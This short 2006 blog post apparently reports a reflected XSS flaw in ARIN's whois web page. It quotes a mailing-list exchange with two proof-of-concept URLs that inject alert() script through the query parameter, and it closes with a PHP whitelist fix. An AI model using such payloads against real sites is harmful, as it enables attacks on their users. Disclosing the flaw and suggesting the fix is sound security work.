ush.it - a beautiful place

Arin.net XSS

March 3, 2006 at 8:55 pm - Filed under Insecurity, Language EN - 128 words, reading time ~0 minutes - Permalink - Comments

J u a n wrote:
> On 3/3/06, Alexander Hristov <joffer@gmail.com> wrote:
>> Just tested : http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22
>> javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>> it still works for me
> works for me on internet explorer, didn't work with firefox 1.5

is an IE and Opera feature, not firefox

test your own http://www_ush_it/team/ascii/img_src_test.html

http://ws.arin.net/whois/?queryinput=%3Cscript%3Ealert('xss')%3C/script%3E
this is universal

htmlentities or whitelist prce match are the correct way to handle xss

$queryinput = 'www_ush_it';
if (!preg_match('|^[a-z0-9\.]{1,255}$|', $queryinput)) exit();

THP USH Wisec DigitalBullets